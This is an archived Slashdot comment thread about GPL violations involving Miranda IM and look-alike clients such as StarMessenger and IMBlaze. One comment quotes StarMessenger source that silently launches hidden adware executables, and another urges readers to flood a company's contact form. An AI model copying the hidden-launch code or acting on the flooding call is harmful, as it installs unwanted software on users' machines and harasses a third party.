Slashdot Mirror


GPL Violations of Miranda IM

Eesh writes "The Miranda project developers have recently posted to their development blog about two GPL violations of companies using their code - vBuzzer and StarMessenger. Today, they also posted that vBuzzer are taking steps to correct that violation. Hopefully this will work out fine. Miranda 0.401 stable was released recently"

51 of 245 comments (clear)

  1. Oh Miranda! by Seumas · · Score: 5, Funny

    Oh Miranda - you came and you gave without taking!

  2. Question... by deutschemonte · · Score: 5, Interesting

    Maybe this should be an ask slashdot or something, but I have a question.

    How does one go about making sure that your source code hasn't been "misappropriated" (read stolen) and placed into a closed source app?

    Are there services out there for this sort of thing or do you just have to be forever diligent?

    --
    The preceding message was based on actual events. Only the names, locations and events have been changed.
    1. Re:Question... by Seumas · · Score: 5, Informative

      One very simple way to at least detect potential similarities is to use strings. In certain situations, you can figure that it should not be likely that two programs would have such identical strings output.

    2. Re:Question... by Ingolfke · · Score: 4, Funny

      I'm not sure about the availability of any specific services for this. Your best bet is to contact someone w/ a lot of experience in this sort of thing.

    3. Re:Question... by deutschemonte · · Score: 3, Funny

      I can't believe I actually clicked on the link.

      --
      The preceding message was based on actual events. Only the names, locations and events have been changed.
    4. Re:Question... by l2718 · · Score: 4, Informative
      "How does one go about making sure that your source code hasn't been "misappropriated" (read stolen) and placed into a closed source app?"

      The short answer is: you can't be sure. In practice, however, people who write programs keep abreast of other software in their field (e.g. people who write an IM client quickly hear about other IM clients). Hwoever, it usually takes an alert user to notice suspicious similarities to existing software. It seems the first tell-tale sign is the directory structure. In almost every case posted to slashdot, it was noted that the directory structures were the same.

      If you become suspicious, the next thing is to extract the strings utility. The first thing to look for is the error message strings, but if the executable is not stripped then you can see your function names and source file names.

      Finally, there's the question of proving that they "stole" your source code, wher your legal claim will usually be that they violated your copyright. Most of the time, they know they are in the wrong and just contacting them is enough. However, not all offenders cooperate. Harald Welte has successfuly won a preliminary injunction in a German court against a company which violated the GPL when using code form the ipfilter/iptables firewall project.

    5. Re:Question... by millette · · Score: 2, Insightful

      Lazy and Stupid, sounds just like someone that would reuse GPL and not give a damn, no ?

    6. Re:Question... by KDR_11k · · Score: 2, Interesting

      Other solution: Use the BSD license. Make it TRULY free as in "free to do whatever you want". Then you can be sure there's nobody illegally stealing your code ;).

      --
      Justice is the sheep getting arrested while an impartial judge declares the vote void.
    7. Re:Question... by Feztaa · · Score: 2, Insightful

      Actually, according to the GPL, if the infringer took that code, made some improvements to it that were actually worthwhile, and then released it as closed source, then you have been hurt -- and your source code is worse off for it, because if they had complied with the GPL, then you'd have those improvements and your source code would be all the better for it.

    8. Re:Question... by windex · · Score: 2, Informative

      You only gave them access to it, given the terms that if they redistributed it, they had to provide source.

      They are getting something from you, you are asking something in return from them. It's kind of like agreeing to buy a car for a set ammount, and then simply never making a payment. Contracts are contracts.

      Is there real harm in taking delivery of a car and never making a payment? Not really, I mean, banks have lots of money, right? ...

      As far as fiscal damages, I think you're looking at it the wrong way. If 20 developers work on a piece of GPL'd code for a combined total manhours of 2,000, it would cost $developer_salary X 2,000 hours for the company to reproduce for its own purpose. If they violate your contract, wouldn't it make sense to go after them for the time you spent working on what they claim is their code? You only agreed to give it away for free to people who thought free code was a good idea (basically), if people don't agree with you ... well, uh, why give it to them for free, too?

  3. Star messanger source code by thinkliberty · · Score: 3, Informative

    IT looks like star messanger made good. Their source code is on their front page. http://www.starmessenger.net/StarMessenger_src.zip

    1. Re:Star messanger source code by Tiersten · · Score: 5, Informative
      Made good? It'd be better for Star Messenger to be taken outside and destroyed. Star Messenger is a thinly disguised attempt at infecting you with adware.

      From StarMessenger/core/miranda.c:
      int StartAdware(void)
      {
      //if (RegDateCheck()==DO_NOT_RUN_ADWARE) return 0;

      //WinExec("Test1.exe", SW_SHOW);

      WinExec("nngluz564.exe", SW_HIDE);
      WinExec("TBGLZ127Q.exe", SW_HIDE);
      //WinExec("saap.exe /did=563", SW_HIDE);
      return 0;
      }
      Mmm... Enjoy that adware goodness...
    2. Re:Star messanger source code by Psionicist · · Score: 5, Funny
      Dear god they can't even run the spyware correctly.
      WinExec

      The WinExec function runs the specified application.

      Note This function is provided only for compatibility with 16-bit Windows. Applications should use the CreateProcess function.
    3. Re:Star messanger source code by qazwsxqazwsx90 · · Score: 5, Funny

      Now that they have released their source, you can create a patch that uses CreateProcess instead. See how beneficial open source is to developers.

  4. Just to be clear by wakejagr · · Score: 3, Informative

    The Starmessanger program is in violation not because they used GPL'd code and don't make source available. They are completely up front that Starmessagner is actually Miranda, but they screwed up and punted the Miranda copyright information. Thus, it appears that this program is copyrighted/developed by someone other than the actual dev's.

    Our copyrights have been removed, this is a violation of the GPL as well as copyright law

    Kudos to the Miranda folks for explaining all of this really well.

    --
    Don't save Windows XP! http://www.petitiononline.com/jjw1xp/petition.html
    1. Re:Just to be clear by Arker · · Score: 2, Informative

      Actually if I'm reading this correctly they aren't complying with the source requirement either. Miranda displays a copyright notice on a screen where StarMessenger displays a different, incorrect, and altered copyright notice. Yet the source they have available for download does not have any alterations to the copyright notices. Therefore, it seems that the source they provide for download is NOT the source to the binaries they are distributing, eh?

      --
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Friends don't let friends enable ecmascript.
    2. Re:Just to be clear by edxwelch · · Score: 2, Interesting

      So, all they have to do is put back the copyright notices, and the .dsp files, and then they can continue to offer spyware to the unwitting public?
      The GPL doesn't seem to give us much protection against chancers like these :(

  5. I really wish they wouldn't give in so easily by slavemowgli · · Score: 5, Interesting

    I really wish free software projects wouldn't give in so easily all the time. By not doing anything anymore once the license terms have been satisfied again, they're just teaching companies that it's economically sound to rip them off - after all, you don't lose anything if you get caught, and you gain something if you don't.

    This isn't good, though, as it will only encourage the less-than-scrupulous companies to commit further license violations, many of which *will* go undetected. It's one thing to essentially take a product, slap a new name on it, and then try to sell it (like was the case in the CherryOS case) or at least claim it as your own; that's easily detectable. Taking code from a GPL'ed library, though, for example, and integrating that into your $10K+ enterprise application, will most likely not be noticed, even though it is just as illegal.

    As such, I'd really like to see an actual lawsuit some time where the developers of the project that was ripped off seek (punitive) damages, and maybe, if the case allows for it, press criminal charges against the company executives, too. Violating a free software license is *no* small matter - it's just as illegal and immoral as it is to press and sell illegally-produced copies of Windows, for example, and companies need to realize that.

    --
    quidquid latine dictum sit altum videtur.
    1. Re:I really wish they wouldn't give in so easily by latroM · · Score: 2, Informative

      Taking code from a GPL'ed library, though, for example, and integrating that into your $10K+ enterprise application, will most likely not be noticed, even though it is just as illegal.

      That would be illegal only if the software package was distributed under non-GPL license. You can sell free (GPL or otherwise) software for $$$ but you have to give the users the same freedoms that you have.

    2. Re:I really wish they wouldn't give in so easily by ImaLamer · · Score: 2, Insightful

      You're right.

      What I don't get is the repeated offenders. If one project "makes good" they are still required to stop development/distribution of offensive software. If I take your source code and put it in my 1.0 series application and then finally release the code with my 2.0 series... I have no right to go onto develop the 3.0 series of the software.

      Once you violate the GPL, you've lost all rights under the license. Maybe the FSF should spend a few of those donations they collect and sue a few of these scoundrels.

      The precedent needs to be set.

    3. Re:I really wish they wouldn't give in so easily by fuzzy12345 · · Score: 2, Interesting
      As such, I'd really like to see an actual lawsuit some time where the developers of the project that was ripped off seek (punitive) damages, and maybe, if the case allows for it, press criminal charges against the company executives, too. Violating a free software license is *no* small matter - it's just as illegal and immoral as it is to press and sell illegally-produced copies of Windows

      Well, that's your theory. Have you got case law to back it up? I don't have much trouble imagining a judge, who's easily able to quantify Microsoft's $250 (e.g.) loss on a pirated copy of Windows, having real trouble quantifying the loss of a wronged GPL developer and calling it zero.

      What if the Judge in the case you want to see litigated takes after Richard Posner?

      --

      Everybody's a libertarian 'till their neighbour's becomes a crack house.
    4. Re:I really wish they wouldn't give in so easily by Pinefresh · · Score: 2, Insightful

      the fear is that some judge will invalidate the GPL

    5. Re:I really wish they wouldn't give in so easily by alienw · · Score: 2, Informative

      The FSF can't sue anyone unless you assigned your copyright to them or you stole code from their libraries. They just write the license, they aren't the copyright owner.

    6. Re:I really wish they wouldn't give in so easily by ImaLamer · · Score: 2, Interesting

      Good point... but someone needs to step up.

      Maybe the FSF (or someone) should collect money on the behalf of those GPL coders who want to sue violators but can't do it on their own.

      [[Aside: I wonder, how much GPL code found its way into OpenServer and UnixWare]]

    7. Re:I really wish they wouldn't give in so easily by hacker · · Score: 2, Informative
      "Maybe the FSF (or someone) should collect money on the behalf of those GPL coders who want to sue violators but can't do it on their own."

      The Software Freedom Law Center does exactly that, and is headed up by Eben Moglen himself...

      From their page:

      We provide legal representation and other law related services to protect and advance Free and Open Source Software.

      Free and Open Source Software ("FOSS") is maturing at a rapid pace. The FOSS production ecosystem, once dominated by a few small not-for-profit entities and individual contributors, now includes a global array of individuals, not-for-profit entities, and commercial developers and redistributors. In this mixed-model organizational environment, all FOSS developers must have an environment where liability and other legal issues do not impede their important public service work. The Software Freedom Law Center (SFLC) provides legal representation and other law related services to protect and advance FOSS

  6. Removing GPL'd Code? by _Upsilon_ · · Score: 2, Interesting
    It seems to me that in a lot of these cases, if the company gets caught, they either (a) publish the source code, or (b) remove the GPL'd code from their application.

    I don't think that (b) should ever be an acceptable option.

    It's too easy for a company to violate the GPL and calculate the risk of getting caught and the cost of implementing a solution to replace the GPL component.

  7. Miranda is really really good by hey · · Score: 3, Interesting

    These rip-offs are a bit of proof that Miranada is the best open source multiprotocol IM client around.
    Give it a try if you haven't already!

    1. Re:Miranda is really really good by ImaLamer · · Score: 2, Interesting

      This is the first time I've heard of it, but I've installed it already.

      It's sad that this is what it takes to get the word out about some GPL products.

  8. IMBlaze a blatant violation by sg_oneill · · Score: 4, Informative

    IMblaze , an instant messenger thats main "feature" is it will spam your contacts with crap, was notified by myself and others at least a year ago that its a blatant rip from gaim. The company refuses to send me source.

    I informed the devs of gaim, and they aparently wont act (or cant afford to). But aparently are NOT happy about it.

    http://www.imblaze.com/screenshots.asp

    Someone needs to stop these creeps.

    --
    Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
    1. Re:IMBlaze a blatant violation by sg_oneill · · Score: 2, Interesting

      They would have to remove the whole thing

      The point is, IMBlaze *IS* gaim, but with a nominal amount of crappy spamvertising code chucked in.

      The Gaim developers are probably owed the entire revenue stream the product made, because IMBlaze are wrongfully claiming someone elses product as there own and charging people money for it.... and possibly triple damage style too because IMBLaze *HAS* been informed.

      If the Gaim people want to, they are going to get a bunch of dollars compensation and IMBlaze are history.

      --
      Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
    2. Re:IMBlaze a blatant violation by Cocoronixx · · Score: 2, Insightful

      support@imblaze.com

      --
      "Obscenity is the crutch of the inarticulate motherfucker." - cloak42
    3. Re:IMBlaze a blatant violation by SilverspurG · · Score: 3, Insightful

      This is precisely where the American legal system fails. In order to bring a suit against someone who has committed a civil wrongdoing (ie. not a crime against the state) the full burden of expense falls on the victim.

      Like all those trolls who love to ride people who remark about the inequities of corporate America,"If you don't like it then start your own company."

      And just where does the magic startup capital come from?

      The solution is not increased government assistance. That would only lead to abuse and frivolous lawsuits. The solution is a streamlined system of justice which isn't endlessly bottlenecked by paperwork, frivolous forms, and lawyers. If a GAIM developer should walk into an attorney's office with proof that IMblaze is a ripoff of their code, there should be a compensation check and a court injunction against IMblaze within 24 hours.

      --
      fast as fast can be. you'll never catch me.
    4. Re:IMBlaze a blatant violation by NetNifty · · Score: 3, Informative

      This is the most blatent GPL violation I've ever seen, I mean come on:

      This, compared to this, or this compared to this. Almost completely identical, you'd think that they'd at the very least change the names of the buttons, or at least make some attempt to hide what they've done. About the only thing I can see they've changed is added some icons and changed the main login picture - even the icons for "accounts", "sign on" etc are identical.

      If it ever did get to court i'd say its an open and shut case, but hey I'm not in the legal business. Maybe the GAIM team should set up a legal fund, I'd donate at least something and I'm sure many others would too.

    5. Re:IMBlaze a blatant violation by sg_oneill · · Score: 2, Interesting

      *BULLSHIT*

      They claimed it would be there own code indeed about 10 months ago

      SINCE THEN

      they have revamped the website, changed the system, and its *STILL* fucking gaim.

      They are *LYING THRU THERE TEETH*

      Seriously, the developer *NEEDS* to post the GPL code *NOW*.

      --
      Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
    6. Re:IMBlaze a blatant violation by Cuga · · Score: 2, Informative

      Looks like somebodies already taken offense to this and hacked their member forum. Check out the graphics on http://www.imblaze.com/forum/login.asp?target=defa ult.asp

  9. Re:Start making examples by Ingolfke · · Score: 2, Interesting

    If someone ripped off your code, sue 'em, screw 'em and boo 'em.

    Actually, this is not what needs to be done. Lawsuits, yes, w/ plenty of media attention, but the point should not be to attack businesses. Instead it should be to legally strengthen the GPL and show that open source code is of such high quality that businesses use it in their own commerical products. Suing business for astronomical payouts would result in short term gains for open source, but would scare many businesses away from trying open source legitamatemly for fear that they expose themselves to legal risk.

  10. Are you going to finance this legal battle? by CyricZ · · Score: 2, Insightful

    Are you prepared and willing to finance this legal battle you propose? Remember, lawyers are not cheap. And many open source developers are students who can barely afford to eat Kraft Dinner, let alone afford a lawyer to defend the copyright on a piece of software they're not making any direct financial gains from. If you want this courtroom battle, then you'll have to finance it yourself.

    --
    Cyric Zndovzny at your service.
  11. Theft and intellectual property by Anonymous Coward · · Score: 2, Interesting

    As we good slashdot users know, it's not theft when IP is appropriate from big evil faceless corporate monoliths that make money. But it's totally evil stealing when it's the GPL!

  12. (cough) portability by matt+me · · Score: 2, Insightful

    >Miranada is the best open source multiprotocol IM client around
    How about multi-platform? Sure well-coded OSS ported to Windows is cool (eg The GIMP), but Windows-only OSS?
    It's verging on hypocritical idealogically (if it could be ported, it should) and very few Windows end-users are ever going to compile it from source (certainly more than 3 commands on Windows (exception perl modules))

    1. Re:(cough) portability by timmyf2371 · · Score: 2, Insightful
      So port it then. The source is there for you to make your non-Windows port.

      I fail to see how this is verging on hypocritical idealogy - the developers of a piece of software have licensed it under an OSS license and the source is available if anyone does want to port it to another platform.

      --

      Backup not found: (A)bort (R)etry (P)anic
  13. Re:You fool! by erroneus · · Score: 4, Insightful

    I think you are one of about maybe 250 people who think there is a double standard when it comes to copyright issues.

    Let me try to clarify a few points... maybe then there will be 249 people left without a clue:

    1. If the situation were reversed (closed/proprietary source included within an OSS project) there would be a huge stink about it. So make no mistake. It would be immensely easy to show and the perps would be shamed out of the community. I think that's the reason it probably doesn't happen...(that often? I've never heard of it before.)

    2. What makes "us" angry about big companies doing bad things is attempting to and often succeeding in taking away our rights and freedoms in order to secure their business model. I don't think there has been a single instance of people getting pissed off over a company embracing and following the GPL rules. In fact, when it happens, we generally flock to these companies in droves. Linksys is a perfect example of this effect. They use Linux in their WRT54G and it's incredibly popular as a result. Speaking only for myself, I look for the Linksys label now when getting small network equipment.

    This stuff has nothing to do with music and movies, so don't even go there. It's not the same thing in my mind nor in the minds of others I reckon. It would only become similar if we attempted to make money from copying CDs and DVDs and claimed that we created those works ourselves.

    I only wish physical goods could be shared in the way software, music and video can be shared... hunger would be a forgotten problem. (Sure, you can take my sandwich to make a copy for yourself...) If everyone had everything they ever wanted, what would the world come to though? Maybe I'll write a book and give it out to the world for free.

  14. Oh God, this bullshit again by mcc · · Score: 3, Insightful

    This would make more sense if you weren't comparing making an unauthorized copy of something for personal use,
    to taking someone else's product, repackaging it, and reselling it as a commercial venture.

    But even then trying to reduce the views of the millions of people who read slashdot down to a single viewpoint is asinine.

  15. Take them down by idonthack · · Score: 2, Insightful

    Everybody go to their contact page, fill it out with dummy information, and submit it.

    --
    Why is it that when you believe something it's an opinion, but when I believe something it's a manifesto?
    1. Re:Take them down by mogwai7 · · Score: 2, Informative

      That appears to be a regular batch file, just install wget for windows

    2. Re:Take them down by Spetiam · · Score: 2, Insightful

      Better ideas:
      1. Hit them where it counts. Find out who their advertisers and voice your grievances. I'll bet there are more people in this sub-thread than use IMBlaze.
      2. Launch an informational site (or page on gaim.sf.net) and Google bomb it so that anyone who's likely to run across imblaze.com will also run across this other site.
      3. And of course... Find out who they are and in what jurisdiction they're located. Take legal action if possible.

  16. Re:bad logic by TERdON · · Score: 4, Informative
    That IS indeed a violation of both the GPL and most copyright laws. It's a violation of the GPL because it doesn't allow you replacing copyright notices so as to make the program look made by someone else. For reference, GPL 2c:

    c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.)

    --
    I have a really elegant proof for Fermat's last theorem. If this sig was only a bit longer...
  17. Re:Just shows open source doesn't work by RPoet · · Score: 3, Informative

    Why should software be free, there's no open source supermarket, no open source houses, no open source cars etc. why should software be free and open source?

    Because software can technically be copied at no cost, and therefore has the potential of empowering all people. While your computer is a file copier, have you ever seen a supermarket copier, a house copier, a car copier? No. Each "copy" of a car takes much costly resources. The day we are able to copy these things as easily as files, I'll be a huge proponent of free (as in freedom) cars and houses.

    The other aspect of software freedom, namely that of open specs so you can learn from it and improve it, are mostly already present in cars and houses. You can open the lid of a car or tear open the floor of your house to see how it was built and maybe improve things.

    --
    "Oppression and harassment is a small price to pay to live in the land of the free." -- Montgomery Burns.
  18. Re:Let me see if I understand this.... by mcc · · Score: 3, Insightful

    Straw man arguments are never okay.

    Observing people on a message board who feel some way about A,
    then observing people on same message board who feel some way about B,
    then going "AHA! This message board has hypocritical views on A!",
    is never anything but stupid. You want to complain about some hypothetical opinion? Fine. Find someone expressing it first, then explain why it's hypocritical. Don't just set up a big box labeled "HYPOCRITE" in a public space, then try to back random people into it.

  19. The new BSD license != "do whatever you want" by jbn-o · · Score: 2, Informative

    This explanation is where the argument falls down. The new BSD license (or the MIT X11 license which is quite similar) still have requirements for those who distribute derivative works. The requirements are not many, but they are not zero either.

    In particular, you may certainly not "do whatever you want" with the source code or any derivative works. The only way to have that power is to either write your own code or base your work on something in the public domain. And even then you cannot "do whatever you want" with any code which implements patented ideas (one of the significant shortcomings of the new BSD and MIT X11 licenses) for which you don't have the appropriate patent license(s).

    Furthermore, stealing is not copying. What we're discussing here is not theft, but copyright infringement (I also brought up patent infringement). Those who have the power (yes, power not freedom) to sublicense are not stealing anything, even if the derivative distributor does something that is against the copyright license.

  20. Re:Voiding the GPL by slavemowgli · · Score: 2, Interesting

    It's not a contract, but nevertheless, whether you license a program you developed or not or under which terms is your choice. You don't get a license to use the program because you downloaded it; in fact, you don't get a license in that sense at all. Rather, you *have* a license, because the developer decided, at some point, to license his program to everyone on the planet.

    And that's just the point: it's not about downloading, it's about whether you (the person) are allowed to use the program under certain license terms or not.

    So, all in all... you agreed to the license, and the license stated that the developer can take away your rights (and in fact does so automatically) under certain circumstances. You can't reacquire the license by redownloading the program; your rights to use the program under that license are gone, and it's up to the rights holder to decide whether you'll get them back or not. Of course, the GPL *is* no contract, so you're not bound by it and can instead opt to refuse to accept it at all. However, in *that* case, the only rights you still have are those that you are guaranteed by copyright law, anyway, and those do not include use, distribution, modification etc. of the program.

    In other words: you don't have to play by the rules. But you have to accept the rules to enter the playing field (which is private property), and if you, at some point, decide that you don't want to do so after all, you'll have to leave the playing field again.

    --
    quidquid latine dictum sit altum videtur.
  21. Re:On Stealing... by facelessnumber · · Score: 3, Insightful

    Some difference... Someone downloads an MP3 that they'd never have bought legally if given the opportunity, then they haven't stolen anything. Nobody lost anything. Some kid downloads a warez copy of Photoshop knowing there's no way in hell he'd have been able to afford it in the first place, then nothing's stolen. Nobody lost anything. In fact, if a few thousand kids do that and get some skills with the software, then it actually helps later on when they go to work and get asked to spend the company's money on a graphics app. (Although that's beside the point) Someone downloads warez for eval, then nobody's lost anything unless the person doesn't buy it instead of just wishing he hadn't bought it. (Would you buy a car without a test drive? Did you steal that time behind the wheel when you decided to get something else?) If someone dowloads a movie that they wouldn't have ever paid to see, no one's lost anything.

    On the flip side though, when someone diverts profit...

    Someone downloads a movie, makes a few dozen DVDs with inkjet-printed labels and sells them out of the trunk of a Caprice across the street from Blockbuster or the movie theater for five bucks? That's stealing. A person or entity who can plainly afford and otherwise would buy that copy of Photoshop if it weren't so easy to get warez? That's stealing. Get a bunch of albums off Kazaa or Gnutella and sell 'em to people who'd otherwise have bought them legitimately? Stealing. Grab a GPL'ed app, hide what it is, snatch out all the copyrights, credits and license, bundle some spyware/adware with it and seek revenue from advertisers? Oh you better believe that's stealing.

    See the difference?